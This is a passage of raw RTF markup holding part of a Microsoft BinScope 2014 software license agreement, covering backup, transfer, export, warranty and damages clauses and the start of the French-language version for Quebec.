3.\\tab}}\\pard\\plain \\ltrpar\\s1\\ql \\fi-357\\li357\\ri0\\sb120\\sa120\\nowidctlpar \\jclisttab\\tx360\\wrapdefault\\aspalpha\\aspnum\\faauto\\ls2\\outlinelevel0\\adjustright\\rin0\\lin357\\itap0\\pararsid7368928 \\rtlch\\fcs1 \\ab\\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\b\\fs19\\lang1033\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 { \\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 BACKUP COPY.}{\\rtlch\\fcs1 \\ab0\\af39\\afs20 \\ltrch\\fcs0 \\b0\\fs20\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 You may make one backup co \\hich\\af39\\dbch\\af13\\loch\\f39 py of the software. You may use it only to reinstall the software. \\par {\\listtext\\pard\\plain\\ltrpar \\s1 \\rtlch\\fcs1 \\ab\\af39\\afs20 \\ltrch\\fcs0 \\b\\fs20\\loch\\af39\\hich\\af39\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 4.\\tab}}{\\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 DOCUMENTATION.}{\\rtlch\\fcs1 \\ab0\\af39\\afs20 \\ltrch\\fcs0 \\b0\\fs20\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 Any person that has valid access to your computer or internal network may copy and use the documentation for your internal, reference purposes. \\par {\\listtext\\pard\\plain\\ltrpar \\s1 \\rtlch\\fcs1 \\ab\\af39\\afs20 \\ltrch\\fcs0 \\b\\fs20\\loch\\af39\\hich\\af39\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 5.\\tab}}{\\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 TRANSFER TO ANOTHER DEVI\\hich\\af39\\dbch\\af13\\loch\\f39 CE.}{\\rtlch\\fcs1 \\ab0\\af39\\afs20 \\ltrch\\fcs0 \\b0\\fs20\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 You may uninstall the software and install it on another device for your use. You may not do so to share this license between devices. \\par {\\listtext\\pard\\plain\\ltrpar \\s1 \\rtlch\\fcs1 \\ab\\af39\\afs20 \\ltrch\\fcs0 \\b\\fs20\\loch\\af39\\hich\\af39\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 6.\\tab}}{\\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 TRANSFER TO A THIRD PARTY.}{\\rtlch\\fcs1 \\ab0\\af39\\afs20 \\ltrch\\fcs0 \\b0\\fs20\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 The first user of the software may transfer it and this agreement directly to a third p \\hich\\af39\\dbch\\af13\\loch\\f39 arty. Before the transfer, that party must agree that this agreement applies to the transfer and use of the software. The first user must uninstall the software before transferring it separately from the device. The first user may not retain any copies. \\par {\\listtext\\pard\\plain\\ltrpar \\s1 \\rtlch\\fcs1 \\ab\\af39\\afs20 \\ltrch\\fcs0 \\b\\fs20\\loch\\af39\\hich\\af39\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 7.\\tab}}{\\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 EXPORT RESTRICTIONS.}{\\rtlch\\fcs1 \\ab0\\af39\\afs20 \\ltrch\\fcs0 \\b0\\fs20\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 The software is subject to United States export laws and regulations. You must comply with all domestic and international export laws and regulations that apply to the software. These laws include restrictions on destinations, end use \\hich\\af39\\dbch\\af13\\loch\\f39 rs and end use. For additional information, see }{\\rtlch\\fcs1 \\ab0\\af0\\afs20 \\ltrch\\fcs0 \\cs32\\b0\\fs20\\ul\\cf2\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 www.microsoft.com/exporting}{\\rtlch\\fcs1 \\ab0\\af39\\afs20 \\ltrch\\fcs0 \\b0\\fs20\\dbch\\af13\\insrsid7368928 .}{\\rtlch\\fcs1 \\ab0\\af0\\afs20 \\ltrch\\fcs0 \\cs32\\b0\\fs20\\ul\\cf2\\dbch\\af13\\insrsid7368928 \\par {\\listtext\\pard\\plain\\ltrpar \\s1 \\rtlch\\fcs1 \\ab\\af39\\afs20 \\ltrch\\fcs0 \\b\\fs20\\loch\\af39\\hich\\af39\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 8.\\tab}}{\\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 SUPPORT SERVICES. }{\\rtlch\\fcs1 \\ab0\\af39\\afs20 \\ltrch\\fcs0 \\b0\\fs20\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 \\hich\\f39 Because this software is \\'93\\loch\\f39 \\hich\\f39 as is,\\'94\\loch\\f39 we may not provide support services for it. \\par {\\listtext\\pard\\plain\\ltrpar \\s1 \\rtlch\\fcs1 \\ab\\af39\\afs20 \\ltrch\\fcs0 \\b\\fs20\\loch\\af39\\hich\\af39\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 9.\\tab}}{\\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 ENTIRE AGREEMENT.}{\\rtlch\\fcs1 \\ab0\\af39\\afs20 \\ltrch\\fcs0 \\b0\\fs20\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 This agreement, and the terms for supplements, updates, Int\\hich\\af39\\dbch\\af13\\loch\\f39 ernet-based services and support services that you use, are the entire agreement for the software and support services. \\par {\\listtext\\pard\\plain\\ltrpar \\s1 \\rtlch\\fcs1 \\ab\\af39\\afs20 \\ltrch\\fcs0 \\b\\fs20\\loch\\af39\\hich\\af39\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 10.\\tab}}\\pard \\ltrpar\\s1\\ql \\fi-360\\li360\\ri0\\sb120\\sa120\\nowidctlpar \\jclisttab\\tx360\\wrapdefault\\aspalpha\\aspnum\\faauto\\ls2\\outlinelevel0\\adjustright\\rin0\\lin360\\itap0\\pararsid7368928 {\\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 APPLICABLE LAW. \\par {\\listtext\\pard\\plain\\ltrpar \\s2 \\rtlch\\fcs1 \\ab\\af39\\afs20 \\ltrch\\fcs0 \\b\\fs20\\loch\\af39\\hich\\af39\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 a.\\tab}}\\pard\\plain \\ltrpar\\s2\\ql \\fi-363\\li720\\ri0\\sb120\\sa120\\nowidctlpar \\jclisttab\\tx720\\wrapdefault\\aspalpha\\aspnum\\faauto\\ls2\\ilvl1\\outlinelevel1\\adjustright\\rin0\\lin720\\itap0\\pararsid7368928 \\rtlch\\fcs1 \\ab\\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\b\\fs19\\lang1033\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 {\\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 United States.}{\\rtlch\\fcs1 \\ab0\\af39\\afs20 \\ltrch\\fcs0 \\b0\\fs20\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 If you acquired the software\\hich\\af39\\dbch\\af13\\loch\\f39 in the United States, Washington state law governs the interpretation of this agreement and applies to claims for breach of it, regardless of conflict of laws principles. The laws of the state where you live govern all other claims, including claims unde \\hich\\af39\\dbch\\af13\\loch\\f39 r\\hich\\af39\\dbch\\af13\\loch\\f39 state consumer protection laws, unfair competition laws, and in tort. \\par {\\listtext\\pard\\plain\\ltrpar \\s2 \\rtlch\\fcs1 \\ab\\af39\\afs20 \\ltrch\\fcs0 \\b\\fs20\\loch\\af39\\hich\\af39\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 b.\\tab}}{\\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 Outside the United States.}{\\rtlch\\fcs1 \\ab0\\af39\\afs20 \\ltrch\\fcs0 \\b0\\fs20\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 If you acquired the software in any other country, the laws of that country apply. \\par {\\listtext\\pard\\plain\\ltrpar \\s1 \\rtlch\\fcs1 \\ab\\af39\\afs20 \\ltrch\\fcs0 \\b\\fs20\\loch\\af39\\hich\\af39\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 11.\\tab}}\\pard\\plain \\ltrpar\\s1\\ql \\fi-357\\li357\\ri0\\sb120\\sa120\\nowidctlpar \\jclisttab\\tx360\\wrapdefault\\aspalpha\\aspnum\\faauto\\ls2\\outlinelevel0\\adjustright\\rin0\\lin357\\itap0\\pararsid7368928 \\rtlch\\fcs1 \\ab\\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\b\\fs19\\lang1033\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 { \\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 LEGAL EFFECT.}{\\rtlch\\fcs1 \\ab0\\af39\\afs20 \\ltrch\\fcs0 \\b0\\fs20\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 This agreement describes certain legal rights. You may\\hich\\af39\\dbch\\af13\\loch\\f39 have other rights under the laws of your country. You may also have rights with respect to the party from whom you acquired the software. This agreement does not change your rights under the laws of your country if the laws of your country do not permit \\hich\\af39\\dbch\\af13\\loch\\f39 i\\hich\\af39\\dbch\\af13\\loch\\f39 t to do so. \\par {\\listtext\\pard\\plain\\ltrpar \\s1 \\rtlch\\fcs1 \\ab\\af39\\afs20 \\ltrch\\fcs0 \\b\\fs20\\loch\\af39\\hich\\af39\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 12.\\tab}}\\pard \\ltrpar\\s1\\ql \\fi-357\\li357\\ri0\\sb120\\sa120\\widctlpar \\jclisttab\\tx360\\wrapdefault\\aspalpha\\aspnum\\faauto\\ls2\\outlinelevel0\\adjustright\\rin0\\lin357\\itap0\\pararsid7368928 {\\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 \\hich\\f39 DISCLAIMER OF WARRANTY. The software is licensed \\'93\\loch\\f39 \\hich\\f39 as-is.\\'94\\loch\\f39 You bear the risk of using it. Microsoft gives no express warranties, guarantees or conditions. You may have additional consumer rights or statutory guarantees under your local laws \\hich\\af39\\dbch\\af13\\loch\\f39 which this agreement cannot change. To the extent permitted under your local laws, Microsoft excludes the implied warranties of merchantability, fitness for a particular purpose and non-infringement. \\par }\\pard\\plain \\ltrpar\\s24\\ql \\li357\\ri0\\sb120\\sa120\\nowidctlpar\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin357\\itap0\\pararsid7368928 \\rtlch\\fcs1 \\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\fs19\\lang1033\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 {\\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\b\\fs20\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 FOR AUSTRALIA \\hich\\f39 \\endash \\loch\\f39 You have statutory guarantees under the \\hich\\af39\\dbch\\af13\\loch\\f39 Australian Consumer Law and nothing in these terms is intended to affect those rights. \\par {\\listtext\\pard\\plain\\ltrpar \\s1 \\rtlch\\fcs1 \\ab\\af39\\afs20 \\ltrch\\fcs0 \\b\\fs20\\loch\\af39\\hich\\af39\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 13.\\tab}}\\pard\\plain \\ltrpar\\s1\\ql \\fi-357\\li357\\ri0\\sb120\\sa120\\widctlpar \\jclisttab\\tx360\\wrapdefault\\aspalpha\\aspnum\\faauto\\ls2\\outlinelevel0\\adjustright\\rin0\\lin357\\itap0\\pararsid7368928 \\rtlch\\fcs1 \\ab\\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\b\\fs19\\lang1033\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 { \\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 LIMITATION ON AND EXCLUSION OF REMEDIES AND DAMAGES}{\\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\insrsid7368928 \\hich\\af39\\dbch\\af11\\loch\\f39 . You can recover from Microsoft and its suppliers only direct damages up to U.S. $5.00. You cannot recover any ot\\hich\\af39\\dbch\\af11\\loch\\f39 her damages, including consequential, lost profits, special, indirect or incidental damages. \\par }\\pard\\plain \\ltrpar\\s24\\ql \\li357\\ri0\\sb120\\sa120\\nowidctlpar\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin357\\itap0\\pararsid7368928 \\rtlch\\fcs1 \\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\fs19\\lang1033\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 {\\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 This limitation applies to \\par {\\listtext\\pard\\plain\\ltrpar \\s25 \\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\loch\\af3\\hich\\af3\\dbch\\af13\\insrsid7368928 \\loch\\af3\\dbch\\af13\\hich\\f3 \\'b7\\tab}}\\pard\\plain \\ltrpar\\s25\\ql \\fi-363\\li720\\ri0\\sb120\\sa120\\nowidctlpar \\jclisttab\\tx720\\wrapdefault\\aspalpha\\aspnum\\faauto\\ls1\\adjustright\\rin0\\lin720\\itap0\\pararsid7368928 \\rtlch\\fcs1 \\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\fs19\\lang1033\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 {\\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 anything related to the software, services, content (including code) on third party Internet sites, or third party programs; and \\par {\\listtext\\pard\\plain\\ltrpar \\s25 \\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\loch\\af3\\hich\\af3\\dbch\\af13\\insrsid7368928 \\loch\\af3\\dbch\\af13\\hich\\f3 \\'b7\\tab}\\hich\\af39\\dbch\\af13\\loch\\f39 cla\\hich\\af39\\dbch\\af13\\loch\\f39 ims for breach of contract, breach of warranty, guarantee or condition, strict liability, negligence, or other tort to the extent permitted by applicable law. \\par }\\pard\\plain \\ltrpar\\ql \\li360\\ri0\\sb120\\sa120\\nowidctlpar\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin360\\itap0\\pararsid7368928 \\rtlch\\fcs1 \\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\fs19\\lang1033\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 {\\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 It also applies even if Microsoft knew or should have known about the possibility of the damages.\\hich\\af39\\dbch\\af13\\loch\\f39 The above limitation or exclusion may not apply to you because your country may not allow the exclusion or limitation of incidental, consequential or other damages. \\par }\\pard\\plain \\ltrpar\\s33\\ql \\li0\\ri0\\sb120\\sa120\\nowidctlpar\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0\\pararsid7368928 \\rtlch\\fcs1 \\ab\\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\b\\fs19\\lang1033\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 {\\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 Please note: As this software is distributed in Quebec, Canada, these license terms are pr\\hich\\af39\\dbch\\af13\\loch\\f39 ovided below in French. \\par }{\\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\lang1036\\langfe1033\\dbch\\af13\\langnp1036\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 Remarque\\~\\hich\\f39 : Ce logiciel \\'e9\\loch\\f39 \\hich\\f39 tant distribu\\'e9\\loch\\f39 \\hich\\f39 au Qu\\'e9\\loch\\f39 \\hich\\f39 bec, Canada, les termes de cette licence sont fournis ci-dessous en fran\\'e7\\loch\\f39 ais.\\sect }\\sectd \\ltrsect\\psz1\\linex0\\headery0\\footery0\\endnhere\\sectlinegrid360\\sectdefaultcl\\sftnbj \\pard\\plain \\ltrpar \\s33\\ql \\li0\\ri0\\sb120\\sa120\\nowidctlpar\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0\\pararsid7368928 \\rtlch\\fcs1 \\ab\\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\b\\fs19\\lang1033\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 {\\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\lang1036\\langfe1033\\dbch\\af13\\langnp1036\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 TERMES DU CONTRAT DE LICENCE D \\hich\\f39 \\rquote \\loch\\f39 UN LOGICIEL MICROSOFT \\par }\\pard\\plain \\ltrpar\\s27\\ql \\li0\\ri0\\sb120\\sa120\\nowidctlpar\\brdrb\\brdrs\\brdrw10\\brsp20 \\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0\\pararsid7368928 \\rtlch\\fcs1 \\ab\\af39\\afs28\\alang1025 \\ltrch\\fcs0 \\b\\fs28\\lang1033\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 {\\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\lang1036\\langfe1033\\dbch\\af13\\langnp1036\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 MICROSOFT BINSCOPE VERSION }{ \\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\lang1036\\langfe1033\\dbch\\af13\\langnp1036\\insrsid6632860 \\hich\\af39\\dbch\\af13\\loch\\f39 2014}{\\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\lang1036\\langfe1033\\dbch\\af13\\langnp1036\\insrsid7368928 \\par }\\pard\\plain \\ltrpar\\s28\\ql \\li0\\ri0\\sb120\\sa120\\nowidctlpar\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0\\pararsid7368928 \\rtlch\\fcs1 \\ab\\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\b\\fs19\\lang1033\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 {\\rtlch\\fcs1 \\ab0\\af39\\afs20 \\ltrch\\fcs0 \\b0\\fs20\\lang1036\\langfe1033\\dbch\\af13\\langnp1036\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 \\hich\\f39 Les pr\\'e9\\loch\\f39 \\hich\\f39 sents termes ont valeur de contrat entre Microsoft Corporation (ou en fonction du lieu o\\'f9\\loch\\f39 vous vivez, l\\hich\\f39 \\rquote \\loch\\f39 \\hich\\f39 un de ses affili\\'e9\\loch\\f39 \\hich\\f39 s) et vous. Lisez-les attentivement. Ils portent sur le logiciel nomm\\'e9\\loch\\f39 ci-dessus, y compris le support sur lequel vous l\\hich\\f39 \\rquote \\loch\\f39 avez r\\hich\\af39\\dbch\\af13\\loch\\f39 e\\loch\\af39\\dbch\\af13\\hich\\f39 \\'e7\\loch\\f39 \\hich\\f39 u le cas \\'e9\\loch\\f39 \\hich\\f39 ch\\'e9\\loch\\f39 \\hich\\f39 ant. Ce contrat porte \\'e9\\loch\\f39 galement sur les produits Microsoft suivants\\~:}{\\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\lang1036\\langfe1033\\dbch\\af13\\langnp1036\\insrsid7368928 \\par {\\listtext\\pard\\plain\\ltrpar \\s25 \\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\lang1036\\langfe1033\\loch\\af3\\hich\\af3\\dbch\\af13\\langnp1036\\insrsid7368928 \\loch\\af3\\dbch\\af13\\hich\\f3 \\'b7\\tab}}\\pard\\plain \\ltrpar \\s25\\ql \\fi-360\\li360\\ri0\\sb120\\sa120\\nowidctlpar\\jclisttab\\tx360\\wrapdefault\\aspalpha\\aspnum\\faauto\\ls1\\adjustright\\rin0\\lin360\\itap0\\pararsid7368928 \\rtlch\\fcs1 \\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\fs19\\lang1033\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 {\\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\lang1036\\langfe1033\\dbch\\af13\\langnp1036\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 \\hich\\f39 les mises \\'e0\\loch\\f39 jour, \\par {\\listtext\\pard\\plain\\ltrpar \\s25 \\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\lang1036\\langfe1033\\loch\\af3\\hich\\af3\\dbch\\af13\\langnp1036\\insrsid7368928 \\loch\\af3\\dbch\\af13\\hich\\f3 \\'b7\\tab}\\hich\\af39\\dbch\\af13\\loch\\f39 \\hich\\f39 les suppl\\'e9\\loch\\f39 ments, \\par {\\listtext\\pard\\plain\\ltrpar \\s25 \\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\lang1036\\langfe1033\\loch\\af3\\hich\\af3\\dbch\\af13\\langnp1036\\insrsid7368928 \\loch\\af3\\dbch\\af13\\hich\\f3 \\'b7\\tab}\\hich\\af39\\dbch\\af13\\loch\\f39 les services Internet et \\par {\\listtext\\pard\\plain\\ltrpar \\s25 \\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\lang1036\\langfe1033\\loch\\af3\\hich\\af3\\dbch\\af13\\langnp1036\\insrsid7368928 \\loch\\af3\\dbch\\af13\\hich\\f3 \\'b7\\tab}\\hich\\af39\\dbch\\af13\\loch\\f39 les services d\\hich\\f39 \\rquote \\loch\\f39 assistance technique \\par }\\pard\\plain \\ltrpar\\s28\\ql \\li0\\ri0\\sb120\\sa120\\nowidctlpar\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0\\pararsid7368928 \\rtlch\\fcs1 \\ab\\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\b\\fs19\\lang1033\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 {\\rtlch\\fcs1 \\ab0\\af39\\afs20 \\ltrch\\fcs0 \\b0\\fs20\\lang1036\\langfe1033\\dbch\\af13\\langnp1036\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 \\hich\\f39 de ce logiciel \\'e0 \\loch\\f39 moins que d\\hich\\f39 \\rquote \\loch\\f39 autres termes n\\hich\\f39 \\rquote \\hich\\af39\\dbch\\af13\\loch\\f39 \\hich\\f39 accompagnent ces produits, auquel cas, ces derniers pr\\'e9\\loch\\f39 valent. \\par }{\\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\lang1036\\langfe1033\\dbch\\af13\\langnp1036\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 En utilisant le logiciel, vous acceptez ces termes. Si vous ne les acceptez pas, n\\hich\\f39 \\rquote \\loch\\f39 utilisez pas le logiciel. \\par }\\pard\\plain \\ltrpar\\s31\\ql \\li0\\ri0\\sb120\\sa120\\nowidctlpar\\brdrt\\brdrs\\brdrw10\\brsp20 \\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0\\pararsid7368928 \\rtlch\\fcs1 \\ab\\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\b\\fs19\\lang1033\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 {\\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\lang1036\\langfe1033\\langnp1036\\insrsid7368928 \\hich\\af39\\dbch\\af11\\loch\\f39 \\hich\\f39 Si vous respectez les pr\\'e9\\loch\\f39 sentes conditions de licence, vous disposez des droits suiv\\hich\\af39\\dbch\\af11\\loch\\f39 \\hich\\f39 ants pour la dur\\'e9\\loch\\f39 \\hich\\f39 e des droits de propri\\'e9\\loch\\f39 \\hich\\f39 t\\'e9\\loch\\f39 intellectuelle.}{\\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\lang1036\\langfe1033\\dbch\\af13\\langnp1036\\insrsid7368928 \\par {\\listtext\\pard\\plain\\ltrpar \\s1 \\rtlch\\fcs1 \\ab\\af39\\afs20 \\ltrch\\fcs0 \\b\\fs20\\loch\\af39\\hich\\af39\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 1.\\tab}}\\pard\\plain \\ltrpar\\s1\\ql \\fi-357\\li357\\ri0\\sb120\\sa120\\nowidctlpar \\jclisttab\\tx360\\wrapdefault\\aspalpha\\aspnum\\faauto\\ls3\\outlinelevel0\\adjustright\\rin0\\lin357\\itap0\\pararsid7368928 \\rtlch\\fcs1 \\ab\\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\b\\fs19\\lang1033\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 { \\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 INSTALLATION ET DROITS D\\hich\\f39 \\rquote \\loch\\f39 UTILISATION. }{\\rtlch\\fcs1 \\ab0\\af39\\afs20 \\ltrch\\fcs0 \\b0\\fs20\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 \\hich\\f39 Vous \\'ea\\loch\\f39 \\hich\\f39 tes autoris\\'e9\\loch\\f39 \\hich\\f39 \\'e0\\~\\loch\\f39 \\hich\\f39 : installer et utiliser un nombre quelconque de copies du logiciel sur vos dispositifs pour concevoir, d\\'e9\\loch\\f39 velopper et tester vos program\\hich\\af39\\dbch\\af13\\loch\\f39 mes. \\par {\\listtext\\pard\\plain\\ltrpar \\s1 \\rtlch\\fcs1 \\ab\\af39\\afs20 \\ltrch\\fcs0 \\b\\fs20\\lang1036\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af13\\langnp1036\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 2.\\tab}}\\pard \\ltrpar\\s1\\ql \\fi-357\\li357\\ri0\\sb120\\sa120\\nowidctlpar \\jclisttab\\tx360\\wrapdefault\\aspalpha\\aspnum\\faauto\\ls2\\outlinelevel0\\adjustright\\rin0\\lin357\\itap0\\pararsid7368928 {\\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\lang1036\\langfe1033\\dbch\\af13\\langnp1036\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 PORTEE DE LA LICENCE.}{\\rtlch\\fcs1 \\ab0\\af39\\afs20 \\ltrch\\fcs0 \\b0\\fs20\\lang1036\\langfe1033\\dbch\\af13\\langnp1036\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 \\hich\\f39 Le logiciel est 